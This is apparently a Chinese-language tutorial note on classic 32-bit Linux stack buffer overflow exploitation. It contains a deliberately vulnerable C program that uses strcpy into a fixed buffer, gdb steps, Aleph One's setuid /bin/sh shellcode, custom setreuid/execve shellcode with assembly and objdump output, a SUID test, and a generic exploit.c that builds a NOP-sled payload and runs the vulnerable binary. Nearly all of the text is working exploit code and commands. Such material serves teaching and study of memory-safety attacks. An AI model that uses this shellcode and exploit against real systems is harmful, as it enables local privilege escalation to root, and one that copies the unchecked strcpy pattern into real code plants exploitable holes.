漏洞代码:
//meet.c
#include<stdio.h>
greeting(char *temp1,char *temp2){
char name[400];
strcpy(name,temp2);
printf("Hello %s %s\n",temp1,name);
}
main(int argc,char *argv[]){
greeting(argv[1],argv[2]);
printf("Bye %s %s\n",argv[1],argv[2]);
}
调试语句:
gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c
gdb meet
list
b 6
`perl -e 'print "A"x403'`
aleph1的shellcode
//shellcode.c
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
}
获得当前esp值
#include<stdio.h>
unsigned long get_sp(void){
__asm__("movl %esp,%eax");
}
int main(){
printf("Stack pointer(ESP):0x%x\n",get_sp());}
perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";'>sc
./meet Mr `perl -e 'print "\x90"x203'``cat sc``perl -e 'print "\x88\xf5\xff\xbf"x89'`
编写自己的shellcode
1.编写汇编
section .text
global _start
_start:
;setreuid(0,0)
xor eax,eax
mov al,0x46
xor ebx,ebx
xor ecx,ecx
int 0x80
;用execve执行shellcode
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
xor edx,edx
mov al,0xb
int 0x80
2.生成可执行文件
nasm -f elf sc.asm
ld -o sc sc.o
3.提取十六进制代码
objdump -d ./sc
[root@localhost root]# objdump -d ./sc
./sc: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: b0 46 mov $0x46,%al
8048084: 31 db xor %ebx,%ebx
8048086: 31 c9 xor %ecx,%ecx
8048088: cd 80 int $0x80
804808a: 31 c0 xor %eax,%eax
804808c: 50 push %eax
804808d: 68 2f 2f 73 68 push $0x68732f2f
8048092: 68 2f 62 69 6e push $0x6e69622f
8048097: 89 e3 mov %esp,%ebx
8048099: 50 push %eax
804809a: 53 push %ebx
804809b: 89 e1 mov %esp,%ecx
804809d: 31 d2 xor %edx,%edx
804809f: b0 0b mov $0xb,%al
80480a1: cd 80 int $0x80
4.放到程序里面测试shellcode
//sc2.c
char sc[]=
"\x31\xc0"
"\xb0\x46"
"\x31\xdb"
"\x31\xc9"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80";
main()
{
void (*fp)(void);
fp=(void *)sc;
fp();
}
5.设置SUID并执行
sudo chown root sc2
sudo chmod +s sc2
./sc2
通用exploit代码
//exploit.c
#include<stdio.h>
char shellcode[]= //setuid(0)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void){
__asm__("movl %esp,%eax");
}
int main(int argc,char *argv[1]){
int i,offset=0;
long esp,ret,*addr_ptr;
char *buffer,*ptr;
int size=500;
esp=get_sp();
if(argc>1) size=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
if(argc>3) esp=strtoul(argv[3],NULL,0);
ret=esp-offset;
fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);
buffer=(char *)malloc(size);
ptr=buffer;
addr_ptr=(long *)ptr;
for(i=0;i<size;i+=4){
*(addr_ptr++)=ret;
}
for(i=0;i<size/2;i++){
buffer[i]='\x90';}
ptr=buffer+size/2;
for(i=0;i<strlen(shellcode);i++){
*(ptr++)=shellcode[i];
}
buffer[size-1]=0;
execl("./meet","meet","Mr.",buffer,0);
printf("%s\n",buffer);
free(buffer);
return 0;
}